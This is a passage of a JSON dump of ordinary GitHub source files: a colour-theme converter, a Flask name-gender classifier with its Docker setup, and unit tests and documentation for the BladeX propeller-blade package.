[ { "alpha_fraction": 0.41361916065216064, "alphanum_fraction": 0.47919294238090515, "avg_line_length": 18.341463088989258, "blob_id": "61a317328cca3513e7c2e65464ed13d645864716", "content_id": "bcf51448fe5b6e9fb389d0fd348f523e4b07afcf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 793, "license_type": "no_license", "max_line_length": 59, "num_lines": 41, "path": "/mno.py", "repo_name": "kalambet/mno", "src_encoding": "UTF-8", "text": "colors = [\n \"000000\",\n \"0a0a0a\",\n \"191919\",\n \"333333\",\n \"4c4c4c\",\n \"666666\",\n \"7f7f7f\",\n \"999999\",\n \"b2b2b2\",\n \"cccccc\",\n \"e5e5e5\",\n \"f5f5f5\",\n \"ffffff\",\n]\n\n\ndef convert():\n lht = open(\"themes/lht.json\", \"r\")\n drk = open(\"themes/drk.json\", \"w\")\n\n lines = []\n\n for line in lht.readlines():\n if any(clr in line for clr in colors):\n lht_clr = \"\".join(list(line.split(\"#\")[1])[:6])\n lht_clr_ndx = colors.index(lht_clr)\n\n drk_clr_ndx = (int(lht_clr_ndx) * -1) - 1\n drk_clr = colors[drk_clr_ndx]\n\n line = line.replace(lht_clr, drk_clr)\n lines.append(line)\n else:\n lines.append(line)\n\n drk.write(\"\".join(lines))\n\n\nif __name__ == \"__main__\":\n convert()\n" }, { "alpha_fraction": 0.7017543911933899, "alphanum_fraction": 0.7953216433525085, "avg_line_length": 170, "blob_id": "c4501e99d2ebb2c4b574a2fa12fc9d0dae06f335", "content_id": "0fbd47f5457a1553ad5bb7e91783bd69d5e2ba93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 342, "license_type": "no_license", "max_line_length": 171, "num_lines": 2, "path": "/readme.md", "repo_name": "kalambet/mno", "src_encoding": "UTF-8", "text": "[![Downloads](https://img.shields.io/visual-studio-marketplace/d/u29dc.mno.svg?colorA=000000&colorB=000000)](https://marketplace.visualstudio.com/items?itemName=u29dc.mno)\n[![Version](https://img.shields.io/visual-studio-marketplace/v/u29dc.mno.svg?colorA=000000&colorB=000000)](https://marketplace.visualstudio.com/items?itemName=u29dc.mno)\n" } ]
2
bazator/Stat.Zal.
https://github.com/bazator/Stat.Zal.
f0c9b92d588cc72e0bd39607c1f2cd421cdb929f
4420460df74cc0ef8196f5f9aecf8edded382e7a
a799d9063c2f94dd48f305f60596e908105bf57d
refs/heads/master
2023-05-11T07:11:29.272226
2020-05-31T20:05:27
2020-05-31T20:05:27
268,355,362
0
0
null
2020-05-31T20:07:22
2020-05-31T20:08:46
2023-05-01T22:37:47
Python
[ { "alpha_fraction": 0.723192036151886, "alphanum_fraction": 0.7256857752799988, "avg_line_length": 32.41666793823242, "blob_id": "dc4ba17926a968f4d62ac72453be797af1a6aa81", "content_id": "a981de01532565972bddadcab1289325c77a5720", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 802, "license_type": "no_license", "max_line_length": 93, "num_lines": 24, "path": "/model.py", "repo_name": "bazator/Stat.Zal.", "src_encoding": "UTF-8", "text": "import random\nimport nltk\n\n\ndef gender_features(word):\n return {'last_letter': word[-1]} # ostatnia litera imienia jako cecha okreslajaca plec\n\n\ndef predict_gender(labeled_names, name_to_predict):\n # losowanie wczytanych imion\n random.shuffle(labeled_names)\n\n # konwersja zbioru imion na zbior cech\n feature_set = [(gender_features(n), gender) for (n, gender) in labeled_names]\n\n # Podzial listy imion na zbior treningowy i testowy\n half = int(len(feature_set) / 2)\n train_set, test_set = feature_set[half:], feature_set[:half]\n\n # trenowanie klasyfikatora naive Bayes, danymi z bazy danych\n classifier = nltk.NaiveBayesClassifier.train(train_set)\n\n # uzycie klasyfikatora, do przewidzenia odpowiedzi\n return classifier.classify(gender_features(name_to_predict))\n" }, { "alpha_fraction": 0.6472346782684326, "alphanum_fraction": 0.6532137393951416, "avg_line_length": 28.130434036254883, "blob_id": "756c08469afa9aae40b684dd7f434269273a84a7", "content_id": "f819eacdb65ae720efa7afc2d583cb79ed265525", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 669, "license_type": "no_license", "max_line_length": 71, "num_lines": 23, "path": "/main.py", "repo_name": "bazator/Stat.Zal.", "src_encoding": "UTF-8", "text": "from flask import Flask, request, render_template\nfrom model import predict_gender\nfrom commands import insert_data_command\nimport db as db_config\n\napp = Flask(__name__)\ndb_config.init_app(app)\napp.cli.add_command(insert_data_command)\n\n\[email protected]('/', methods=['POST', 'GET'])\ndef hello_world():\n if request.method == 'POST':\n name = request.form['name']\n result = db_config.get_db().execute('SELECT* FROM person_name')\n names = [(name['name'], name['gender']) for name in result]\n gender = predict_gender(names, name)\n\n return render_template('base.html', **locals())\n\n\nif __name__ == \"__main__\":\n\tapp.run(debug=True, host=\"0.0.0.0\")" }, { "alpha_fraction": 0.554347813129425, "alphanum_fraction": 0.6413043737411499, "avg_line_length": 21.75, "blob_id": "51d917045385dfa597ed661e41bf999d227cb5df", "content_id": "527dbc30369d261578e90a94fee87ca65badff3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 92, "license_type": "no_license", "max_line_length": 33, "num_lines": 4, "path": "/start.sh", "repo_name": "bazator/Stat.Zal.", "src_encoding": "UTF-8", "text": "#!/bin/bash\napp=\"docker.imiona\"\ndocker build -t ${app} .\ndocker run -d -p 5000:5000 ${app}\n\n" }, { "alpha_fraction": 0.7564102411270142, "alphanum_fraction": 0.7564102411270142, "avg_line_length": 21.428571701049805, "blob_id": "8540715a94f9415cbefde3015cfc3a99bd56be98", "content_id": "236e566a70dd6ea09b878c10235835180f291354", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 156, "license_type": "no_license", "max_line_length": 39, "num_lines": 7, "path": "/schema.sql", "repo_name": "bazator/Stat.Zal.", "src_encoding": "UTF-8", "text": "DROP TABLE IF EXISTS person_name;\n\nCREATE TABLE person_name (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n name TEXT UNIQUE NOT NULL,\n gender TEXT NOT NULL\n);" }, { "alpha_fraction": 0.7222222089767456, "alphanum_fraction": 0.7452107071876526, "avg_line_length": 23.85714340209961, "blob_id": "ea850e6137ccc08a3f5bc5371edc4d3dd4c89315", "content_id": "9cc14659b61022e75fbb2c376801807f1871fc51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 522, "license_type": "no_license", "max_line_length": 89, "num_lines": 21, "path": "/Dockerfile", "repo_name": "bazator/Stat.Zal.", "src_encoding": "UTF-8", "text": "FROM ubuntu:18.04\n\nRUN apt-get update -y && apt-get install -y python-pip python-dev python3-dev python3-pip\n\nENV STATIC_URL /static\nENV STATIC_PATH /home/docker-server/www/app/static\nCOPY ./requirements.txt /var/www/requirements.txt\n\nWORKDIR /app\n\nCOPY . /app\nCOPY templates /app/templates\n\nRUN python3 -m pip install -r /app/requirements.txt \nENV FLASK_APP /app/main.py\nENV LC_ALL C.UTF-8\nENV LANG C.UTF-8\nRUN python3 -m flask init-db\nRUN python3 -m flask insert-data polish_names.csv\n\nCMD [ \"python3\", \"/app/main.py\" ]\n" }, { "alpha_fraction": 0.6463414430618286, "alphanum_fraction": 0.6480836272239685, "avg_line_length": 23.95652198791504, "blob_id": "67756a271e451354206160d00938d97edb86ce63", "content_id": "35d34ff7836d801545a5240cd4ca614c342f39f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 574, "license_type": "no_license", "max_line_length": 76, "num_lines": 23, "path": "/commands.py", "repo_name": "bazator/Stat.Zal.", "src_encoding": "UTF-8", "text": "import click\nfrom flask.cli import with_appcontext\nimport db as db_config\n\n\[email protected]('insert-data')\[email protected](\"filename\")\n@with_appcontext\ndef insert_data_command(filename):\n db = db_config.get_db()\n items = []\n\n file = open(filename, 'r', encoding='utf8')\n file.readline()\n for line in file:\n name, gender = line.split(',')\n items.append((name.strip(), gender.strip()))\n\n query = 'INSERT OR IGNORE INTO person_name (name, gender) VALUES (?, ?)'\n db.executemany(query, items)\n db.commit()\n\n click.echo('Names inserted.')\n" } ]
6
mahgadalla/BladeX
https://github.com/mahgadalla/BladeX
bd625f73cb9413c9919cb2656ebcb1de101e06d1
22f7cf2054ff927a595e55db379702a1fc82478f
45f15d4eb00f88a7a71d03e744ec13618ba826c6
refs/heads/master
2021-04-09T10:17:48.688045
2018-06-20T16:23:14
2018-06-20T16:23:14
125,380,428
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5486994981765747, "alphanum_fraction": 0.5722267031669617, "avg_line_length": 37.63069534301758, "blob_id": "17f3fd6b76ea9ee6ba2ac03e58b90798a725f1ce", "content_id": "774f77d8f2574fbaafa4feda214e72aead06176e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16109, "license_type": "permissive", "max_line_length": 80, "num_lines": 417, "path": "/tests/test_blade.py", "repo_name": "mahgadalla/BladeX", "src_encoding": "UTF-8", "text": "from unittest import TestCase\nimport bladex.profiles as pr\nimport bladex.blade as bl\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\n\n\ndef create_sample_blade_NACA():\n sections = np.asarray([pr.NacaProfile(digits='0012') for i in range(10)])\n radii = np.arange(0.4, 1.31, 0.1)\n chord_lengths = np.concatenate((np.arange(0.55, 1.1, 0.15),\n np.arange(1.03, 0.9, -0.03),\n np.array([0.3])))\n pitch = np.append(np.arange(3.0, 4., 0.2), np.arange(4.1, 3.2, -0.2))\n rake = np.append(np.arange(5e-3, 0.08, 1e-2), np.arange(0.075, 0.02, -3e-2))\n skew_angles = np.append(np.arange(-4., -9., -3.), np.arange(-7., 15., 3.))\n return bl.Blade(\n sections=sections,\n radii=radii,\n chord_lengths=chord_lengths,\n pitch=pitch,\n rake=rake,\n skew_angles=skew_angles)\n\n\ndef create_sample_blade_custom():\n xup = np.linspace(-1.0, 1.0, 5)\n yup = np.array([0.0, 0.75, 1.0, 0.75, 0.0])\n xdown = np.linspace(-1.0, 1.0, 5)\n ydown = np.zeros(5)\n sections = np.asarray([\n pr.CustomProfile(xup=xup, yup=yup, xdown=xdown, ydown=ydown)\n for i in range(10)\n ])\n radii = np.arange(0.4, 1.31, 0.1)\n chord_lengths = np.concatenate((np.arange(0.55, 1.1, 0.15),\n np.arange(1.03, 0.9, -0.03),\n np.array([0.3])))\n pitch = np.append(np.arange(3.0, 4., 0.2), np.arange(4.1, 3.2, -0.2))\n rake = np.append(np.arange(5e-3, 0.08, 1e-2), np.arange(0.075, 0.02, -3e-2))\n skew_angles = np.append(np.arange(-4., -9., -3.), np.arange(-7., 15., 3.))\n return bl.Blade(\n sections=sections,\n radii=radii,\n chord_lengths=chord_lengths,\n pitch=pitch,\n rake=rake,\n skew_angles=skew_angles)\n\n\nclass TestBlade(TestCase):\n \"\"\"\n Test case for the blade module.\n We first test using NACA and custom profiles then we proceed only with NACA\n to avoid WET code.\n \"\"\"\n\n def test_sections_inheritance_naca(self):\n blade = create_sample_blade_NACA()\n self.assertIsInstance(blade.sections[0], pr.NacaProfile)\n\n def test_sections_inheritance_custom(self):\n blade = create_sample_blade_custom()\n self.assertIsInstance(blade.sections[0], pr.CustomProfile)\n\n def test_sections_1_naca(self):\n blade = create_sample_blade_NACA()\n self.assertIsInstance(blade.sections, np.ndarray)\n\n def test_sections_1_custom(self):\n blade = create_sample_blade_custom()\n self.assertIsInstance(blade.sections, np.ndarray)\n\n def test_sections_2_naca(self):\n blade = create_sample_blade_NACA()\n self.assertIsInstance(blade.sections[0].xup_coordinates, np.ndarray)\n\n def test_sections_2_custom(self):\n blade = create_sample_blade_custom()\n self.assertIsInstance(blade.sections[0].xup_coordinates, np.ndarray)\n\n def test_radii_naca(self):\n blade = create_sample_blade_NACA()\n np.testing.assert_equal(blade.radii, np.arange(0.4, 1.31, 0.1))\n\n def test_radii_custom(self):\n blade = create_sample_blade_custom()\n np.testing.assert_equal(blade.radii, np.arange(0.4, 1.31, 0.1))\n\n def test_chord_naca(self):\n blade = create_sample_blade_NACA()\n np.testing.assert_equal(blade.chord_lengths,\n np.concatenate((np.arange(0.55, 1.1, 0.15),\n np.arange(1.03, 0.9, -0.03),\n np.array([0.3]))))\n\n def test_chord_custom(self):\n blade = create_sample_blade_custom()\n np.testing.assert_equal(blade.chord_lengths,\n np.concatenate((np.arange(0.55, 1.1, 0.15),\n np.arange(1.03, 0.9, -0.03),\n np.array([0.3]))))\n\n def test_pitch_naca(self):\n blade = create_sample_blade_NACA()\n np.testing.assert_equal(blade.pitch,\n np.append(\n np.arange(3.0, 4., 0.2),\n np.arange(4.1, 3.2, -0.2)))\n\n def test_pitch_custom(self):\n blade = create_sample_blade_custom()\n np.testing.assert_equal(blade.pitch,\n np.append(\n np.arange(3.0, 4., 0.2),\n np.arange(4.1, 3.2, -0.2)))\n\n def test_rake_naca(self):\n blade = create_sample_blade_NACA()\n np.testing.assert_equal(blade.rake,\n np.append(\n np.arange(5e-3, 0.08, 1e-2),\n np.arange(0.075, 0.02, -3e-2)))\n\n def test_rake_custom(self):\n blade = create_sample_blade_custom()\n np.testing.assert_equal(blade.rake,\n np.append(\n np.arange(5e-3, 0.08, 1e-2),\n np.arange(0.075, 0.02, -3e-2)))\n\n def test_skew_naca(self):\n blade = create_sample_blade_NACA()\n np.testing.assert_equal(blade.skew_angles,\n np.append(\n np.arange(-4., -9., -3.),\n np.arange(-7., 15., 3.)))\n\n def test_skew_custom(self):\n blade = create_sample_blade_custom()\n np.testing.assert_equal(blade.skew_angles,\n np.append(\n np.arange(-4., -9., -3.),\n np.arange(-7., 15., 3.)))\n\n def test_sections_list_to_ndarray(self):\n blade = create_sample_blade_NACA()\n blade.sections = [pr.NacaProfile(digits='0012') for i in range(10)]\n blade._check_params()\n self.assertIsInstance(blade.sections, np.ndarray)\n\n def test_radii_list_to_ndarray(self):\n blade = create_sample_blade_NACA()\n blade.radii = list(range(10))\n blade._check_params()\n self.assertIsInstance(blade.radii, np.ndarray)\n\n def test_chord_list_to_ndarray(self):\n blade = create_sample_blade_NACA()\n blade.chord_lengths = list(range(10))\n blade._check_params()\n self.assertIsInstance(blade.chord_lengths, np.ndarray)\n\n def test_pitch_list_to_ndarray(self):\n blade = create_sample_blade_NACA()\n blade.pitch = list(range(10))\n blade._check_params()\n self.assertIsInstance(blade.pitch, np.ndarray)\n\n def test_rake_list_to_ndarray(self):\n blade = create_sample_blade_NACA()\n blade.rake = list(range(10))\n blade._check_params()\n self.assertIsInstance(blade.rake, np.ndarray)\n\n def test_skew_list_to_ndarray(self):\n blade = create_sample_blade_NACA()\n blade.skew_angles = list(range(10))\n blade._check_params()\n self.assertIsInstance(blade.skew_angles, np.ndarray)\n\n def test_sections_array_different_length(self):\n blade = create_sample_blade_NACA()\n blade.sections = np.arange(9)\n with self.assertRaises(ValueError):\n blade._check_params()\n\n def test_radii_array_different_length(self):\n blade = create_sample_blade_NACA()\n blade.radii = np.arange(9)\n with self.assertRaises(ValueError):\n blade._check_params()\n\n def test_chord_array_different_length(self):\n blade = create_sample_blade_NACA()\n blade.chord_lengths = np.arange(9)\n with self.assertRaises(ValueError):\n blade._check_params()\n\n def test_pitch_array_different_length(self):\n blade = create_sample_blade_NACA()\n blade.pitch = np.arange(9)\n with self.assertRaises(ValueError):\n blade._check_params()\n\n def test_rake_array_different_length(self):\n blade = create_sample_blade_NACA()\n blade.rake = np.arange(9)\n with self.assertRaises(ValueError):\n blade._check_params()\n\n def test_skew_array_different_length(self):\n blade = create_sample_blade_NACA()\n blade.skew_angles = np.arange(9)\n with self.assertRaises(ValueError):\n blade._check_params()\n\n def test_compute_pitch_angle(self):\n blade = create_sample_blade_NACA()\n blade.radii[1] = 1.\n blade.pitch[1] = 2.0 * np.pi\n blade.pitch_angles = blade._compute_pitch_angle()\n assert blade.pitch_angles[1] == (np.pi / 4.0)\n\n def test_pitch_angles_array_length(self):\n blade = create_sample_blade_NACA()\n assert blade.pitch_angles.size == 10\n\n def test_induced_rake_from_skew(self):\n blade = create_sample_blade_NACA()\n blade.radii[1] = 1.\n blade.skew_angles[1] = 45.\n blade.pitch_angles[1] = np.pi / 4.\n blade.induced_rake = blade._induced_rake_from_skew()\n np.testing.assert_almost_equal(blade.induced_rake[1], np.pi / 4.)\n\n def test_induced_rake_array_length(self):\n blade = create_sample_blade_NACA()\n assert blade.induced_rake.size == 10\n\n def test_blade_coordinates_up_init(self):\n blade = create_sample_blade_NACA()\n assert len(blade.blade_coordinates_up) == 0\n\n def test_blade_coordinates_down_init(self):\n blade = create_sample_blade_NACA()\n assert len(blade.blade_coordinates_down) == 0\n\n def test_planar_to_cylindrical_blade_up(self):\n blade = create_sample_blade_NACA()\n blade._planar_to_cylindrical()\n blade_coordinates_up_expected = np.load(\n 'tests/test_datasets/planar_to_cylindrical_blade_up.npy')\n np.testing.assert_almost_equal(blade.blade_coordinates_up,\n blade_coordinates_up_expected)\n\n def test_planar_to_cylindrical_blade_down(self):\n blade = create_sample_blade_NACA()\n blade._planar_to_cylindrical()\n blade_coordinates_down_expected = np.load(\n 'tests/test_datasets/planar_to_cylindrical_blade_down.npy')\n np.testing.assert_almost_equal(blade.blade_coordinates_down,\n blade_coordinates_down_expected)\n\n def test_transformations_reflect_blade_up(self):\n blade = create_sample_blade_NACA()\n blade.apply_transformations(reflect=True)\n blade_coordinates_up_expected = np.load(\n 'tests/test_datasets/blade_up_after_transformation_reflect.npy')\n np.testing.assert_almost_equal(blade.blade_coordinates_up,\n blade_coordinates_up_expected)\n\n def test_transformations_reflect_blade_down(self):\n blade = create_sample_blade_NACA()\n blade.apply_transformations(reflect=True)\n blade_coordinates_down_expected = np.load(\n 'tests/test_datasets/blade_down_after_transformation_reflect.npy')\n np.testing.assert_almost_equal(blade.blade_coordinates_down,\n blade_coordinates_down_expected)\n\n def test_transformations_no_reflect_blade_up(self):\n blade = create_sample_blade_NACA()\n blade.apply_transformations(reflect=False)\n blade_coordinates_up_expected = np.load(\n 'tests/test_datasets/blade_up_after_transformation_no_reflect.npy')\n np.testing.assert_almost_equal(blade.blade_coordinates_up,\n blade_coordinates_up_expected)\n\n def test_transformations_no_reflect_blade_down(self):\n blade = create_sample_blade_NACA()\n blade.apply_transformations(reflect=False)\n blade_coordinates_down_expected = np.load(\n 'tests/test_datasets/blade_down_after_transformation_no_reflect.npy'\n )\n np.testing.assert_almost_equal(blade.blade_coordinates_down,\n blade_coordinates_down_expected)\n\n def test_plot(self):\n blade = create_sample_blade_NACA()\n blade.apply_transformations()\n blade.plot()\n plt.close()\n\n def test_plot_view_elev_init(self):\n blade = create_sample_blade_NACA()\n blade.apply_transformations()\n blade.plot(elev=None)\n plt.close()\n\n def test_plot_view_elev(self):\n blade = create_sample_blade_NACA()\n blade.apply_transformations()\n blade.plot(elev=45)\n plt.close()\n\n def test_plot_view_azim_init(self):\n blade = create_sample_blade_NACA()\n blade.apply_transformations()\n blade.plot(azim=None)\n plt.close()\n\n def test_plot_view_azim(self):\n blade = create_sample_blade_NACA()\n blade.apply_transformations()\n blade.plot(azim=-90)\n plt.close()\n\n def test_plot_save(self):\n blade = create_sample_blade_NACA()\n blade.apply_transformations()\n blade.plot(outfile='tests/test_datasets/test_plot.png')\n plt.close()\n self.assertTrue(os.path.isfile('tests/test_datasets/test_plot.png'))\n self.addCleanup(os.remove, 'tests/test_datasets/test_plot.png')\n\n def test_plot_exceptions(self):\n blade = create_sample_blade_NACA()\n with self.assertRaises(ValueError):\n blade.plot()\n\n def test_abs_to_norm_radii(self):\n blade = create_sample_blade_NACA()\n blade.radii[0] = 1.\n blade._abs_to_norm(D_prop=1.)\n assert blade.radii[0] == 2.\n\n def test_abs_to_norm_chord(self):\n blade = create_sample_blade_NACA()\n blade.chord_lengths[0] = 1.\n blade._abs_to_norm(D_prop=2.)\n assert blade.chord_lengths[0] == 0.5\n\n def test_abs_to_norm_pitch(self):\n blade = create_sample_blade_NACA()\n blade.pitch[0] = 1.\n blade._abs_to_norm(D_prop=2.)\n assert blade.pitch[0] == 0.5\n\n def test_abs_to_norm_rake(self):\n blade = create_sample_blade_NACA()\n blade.rake[0] = 1.\n blade._abs_to_norm(D_prop=2.)\n assert blade.rake[0] == 0.5\n\n def test_norm_to_abs_radii(self):\n blade = create_sample_blade_NACA()\n blade.radii[0] = 1.\n blade._norm_to_abs(D_prop=1.)\n assert blade.radii[0] == 0.5\n\n def test_norm_to_abs_chord(self):\n blade = create_sample_blade_NACA()\n blade.chord_lengths[0] = 1.5\n blade._norm_to_abs(D_prop=2.)\n assert blade.chord_lengths[0] == 3.\n\n def test_norm_to_abs_pitch(self):\n blade = create_sample_blade_NACA()\n blade.pitch[0] = 1.5\n blade._norm_to_abs(D_prop=2.)\n assert blade.pitch[0] == 3.\n\n def test_norm_to_abs_rake(self):\n blade = create_sample_blade_NACA()\n blade.rake[0] = 1.5\n blade._norm_to_abs(D_prop=2.)\n assert blade.rake[0] == 3.\n\n def test_export_ppg(self):\n blade = create_sample_blade_NACA()\n blade.export_ppg(\n filename='tests/test_datasets/data_out.ppg',\n D_prop=0.25,\n D_hub=0.075,\n n_blades=5)\n self.assertTrue(os.path.isfile('tests/test_datasets/data_out.ppg'))\n self.addCleanup(os.remove, 'tests/test_datasets/data_out.ppg')\n\n def test_blade_str_method(self):\n blade = create_sample_blade_NACA()\n string = ''\n string += 'Blade number of sections = {}'.format(blade.n_sections)\n string += '\\nBlade radii sections = {}'.format(blade.radii)\n string += '\\nChord lengths of the sectional profiles'\\\n ' = {}'.format(blade.chord_lengths)\n string += '\\nRadial distribution of the pitch (in unit lengths)'\\\n ' = {}'.format(blade.pitch)\n string += '\\nRadial distribution of the rake (in unit length)'\\\n ' = {}'.format(blade.rake)\n string += '\\nRadial distribution of the skew angles'\\\n ' (in degrees) = {}'.format(blade.skew_angles)\n string += '\\nPitch angles (in radians) for the'\\\n ' sections = {}'.format(blade.pitch_angles)\n string += '\\nInduced rake from skew (in unit length)'\\\n ' for the sections = {}'.format(blade.induced_rake)\n assert blade.__str__() == string\n" }, { "alpha_fraction": 0.7343517541885376, "alphanum_fraction": 0.7400297522544861, "avg_line_length": 47.98675537109375, "blob_id": "1918f59b611895e368f266aff654e1f4117bc6a1", "content_id": "aa2e5ecf2a710d3e7c22605cfcb677534e78a86e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7397, "license_type": "permissive", "max_line_length": 741, "num_lines": 151, "path": "/README.md", "repo_name": "mahgadalla/BladeX", "src_encoding": "UTF-8", "text": "**BladeX**: Python Package for Blade Deformation\n\n<p align=\"center\">\n <a href=\"http://mathlab.github.io/BladeX/\" target=\"_blank\" >\n <img alt=\"Python Package for Blade Deformation\" src=\"docs/source/_static/logo_bladex.png\" width=\"200\" />\n </a>\n</p>\n<p align=\"center\">\n <a href=\"LICENSE.rst\" target=\"_blank\">\n <img alt=\"Software License\" src=\"https://img.shields.io/badge/license-MIT-brightgreen.svg?style=flat-square\">\n </a>\n <a href=\"https://travis-ci.org/mathLab/BladeX\" target=\"_blank\">\n <img alt=\"Build Status\" src=\"https://travis-ci.org/mathLab/BladeX.svg\">\n </a>\n <a href=\"https://coveralls.io/github/mathLab/BladeX?branch=master\" target=\"_blank\">\n <img alt=\"Coverage Status\" src=\"https://coveralls.io/repos/github/mathLab/BladeX/badge.svg?branch=master\">\n </a>\n <a href=\"https://www.codacy.com/app/mathLab/BladeX?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=mathLab/BladeX&amp;utm_campaign=Badge_Grade\" target=\"_blank\">\n <img alt=\"Codacy Badge\" src=\"https://api.codacy.com/project/badge/Grade/75f02cdeed684c25a273eaffb0d89880\">\n </a>\n</p>\n\n[BladeX](http://mathlab.github.io/BladeX/) (Python Blade Deformation) is a Python package for geometrical parametrization and bottom-up construction of propeller blades. It allows to generate and deform a blade based on the radial distribution of its parameters.\n\n## Table of contents\n* [Description](#description)\n* [Dependencies and installation](#dependencies-and-installation)\n\t* [Installing from source](#installing-from-source)\n* [Documentation](#documentation)\n* [Testing](#testing)\n* [Examples](#examples)\n* [Authors and contributors](#authors-and-contributors)\n* [How to contribute](#how-to-contribute)\n\t* [Submitting a patch](#submitting-a-patch) \n* [License](#license)\n\n## Description\n**BladeX** is a Python package for geometrical parametrization and bottom-up construction of propeller blades. It allows to generate and deform a blade based on the radial distribution of its parameters such as `pitch`, `rake`, `skew`, and the sectional foils' parameters such as `chord` and `camber`. The package is ideally suited for parametric simulations on large number of blade deformations. It provides an automated procedure for the CAD generation, hence reducing the time and effort required for modelling. The main scope of BladeX is to deal with propeller blades, however it can be flexible to be applied on further applications with analogous geometrical structures such as aircraft wings, turbomachinery, or wind turbine blades.\n\nSee the [**Examples**](#examples) section below and the [**Tutorials**](tutorials/README.md) to have an idea of the potential of this package.\n\n## Dependencies and installation\n**BladeX** requires requires `numpy`, `scipy`, `matplotlib`, and `sphinx` (for the documentation). The code is compatible with Python 2.7 and Python 3.6. It can be installed using `pip` or directly from the source code.\n\n\n### Installing from source\nThe official distribution is on GitHub, and you can clone the repository using\n```bash\n> git clone https://github.com/mathLab/BladeX\n```\n\nTo install the package just type:\n```bash\n> python setup.py install\n```\n\nTo uninstall the package you have to rerun the installation and record the installed files in order to remove them:\n\n```bash\n> python setup.py install --record installed_files.txt\n> cat installed_files.txt | xargs rm -rf\n```\n\n## Documentation\n**BladeX** uses [Sphinx](http://www.sphinx-doc.org/en/stable/) for code documentation. You can view the documentation online [here](http://mathlab.github.io/BladeX/). To build the html version of the docs locally simply:\n\n```bash\n> cd docs\n> make html\n```\n\nThe generated html can be found in `docs/build/html`. Open up the `index.html` you find there to browse.\n\n\n## Testing\n\nWe are using Travis CI for continuous intergration testing. You can check out the current status [here](https://travis-ci.org/mathLab/BladeX).\n\nTo run tests locally:\n\n```bash\n> python test.py\n```\n\n## Examples\nYou can find useful tutorials on how to use the package in the [tutorials](tutorials/README.md) folder.\nHere we show a bottom-up parametrized construction of the [Potsdam Propeller Test Case (PPTC)](https://www.sva-potsdam.de/pptc-smp11-workshop) provided the sectional profiles as well as the radial distribution of the `pitch`, `rake`, `skew`. The blade is generated and exported to .iges and .stl formats.\n\n<p align=\"center\">\n<img src=\"readme/PPTC.png\" alt>\n</p>\n<p align=\"center\">\n<em>PPTC blade generation according to the radial distribution of the pitch, rake, skew. The generated blade is then exported to .iges and .stl formats.</em>\n</p>\n\n\n## Authors and contributors\n**BladeX** is currently developed and mantained at [SISSA mathLab](http://mathlab.sissa.it/) by\n* [Mahmoud Gadalla](mailto:[email protected])\n* [Marco Tezzele](mailto:[email protected])\n\nunder the supervision of [Dr. Andrea Mola](mailto:[email protected]) and [Prof. Gianluigi Rozza](mailto:[email protected]).\n\nContact us by email for further information or questions about **BladeX**, or suggest pull requests. Contributions improving either the code or the documentation are welcome!\n\n\n## How to contribute\nWe'd love to accept your patches and contributions to this project. There are just a few small guidelines you need to follow.\n\n### Submitting a patch\n\n 1. It's generally best to start by opening a new issue describing the bug or\n feature you're intending to fix. Even if you think it's relatively minor,\n it's helpful to know what people are working on. Mention in the initial\n issue that you are planning to work on that bug or feature so that it can\n be assigned to you.\n\n 2. Follow the normal process of [forking][] the project, and setup a new\n branch to work in. It's important that each group of changes be done in\n separate branches in order to ensure that a pull request only includes the\n commits related to that bug or feature.\n\n 3. To ensure properly formatted code, please make sure to use 4\n spaces to indent the code. The easy way is to run on your bash the provided\n script: ./code_formatter.sh. You should also run [pylint][] over your code.\n It's not strictly necessary that your code be completely \"lint-free\",\n but this will help you find common style issues.\n\n 4. Any significant changes should almost always be accompanied by tests. The\n project already has good test coverage, so look at some of the existing\n tests if you're unsure how to go about it. We're using [coveralls][] that\n is an invaluable tools for seeing which parts of your code aren't being\n exercised by your tests.\n\n 5. Do your best to have [well-formed commit messages][] for each change.\n This provides consistency throughout the project, and ensures that commit\n messages are able to be formatted properly by various git tools.\n\n 6. Finally, push the commits to your fork and submit a [pull request][]. Please,\n remember to rebase properly in order to maintain a clean, linear git history.\n\n[forking]: https://help.github.com/articles/fork-a-repo\n[pylint]: https://www.pylint.org/\n[coveralls]: https://coveralls.io\n[well-formed commit messages]: http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html\n[pull request]: https://help.github.com/articles/creating-a-pull-request\n\n\n## License\n\nSee the [LICENSE](LICENSE.rst) file for license rights and limitations (MIT).\n" }, { "alpha_fraction": 0.7002187967300415, "alphanum_fraction": 0.7002187967300415, "avg_line_length": 15.285714149475098, "blob_id": "20bdff24e95c529805861ce48523209d1a611458", "content_id": "fc41250cbb128960a90ba9f3c5709fe89f282627", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 457, "license_type": "permissive", "max_line_length": 31, "num_lines": 28, "path": "/docs/source/blade.rst", "repo_name": "mahgadalla/BladeX", "src_encoding": "UTF-8", "text": "Blade \n=================\n\n.. currentmodule:: bladex.blade\n\n.. automodule:: bladex.blade\n\n.. autosummary::\n\t:toctree: _summaries\n\t:nosignatures:\n\n\tBlade._abs_to_norm\n\tBlade._check_params\n\tBlade._compute_pitch_angle\n\tBlade._induced_rake_from_skew\n\tBlade._norm_to_abs\n\tBlade._planar_to_cylindrical\n\tBlade.apply_transformations\n\tBlade.plot\n\tBlade.export_ppg\n\t\n\n.. autoclass:: Blade\n\t:members:\n\t:private-members:\n\t:undoc-members:\n\t:show-inheritance:\n\t:noindex:\n\n" }, { "alpha_fraction": 0.6339017152786255, "alphanum_fraction": 0.6349047422409058, "avg_line_length": 17.811321258544922, "blob_id": "adf5cb0059ebf49d6d57bf0cdb24817b1f117afb", 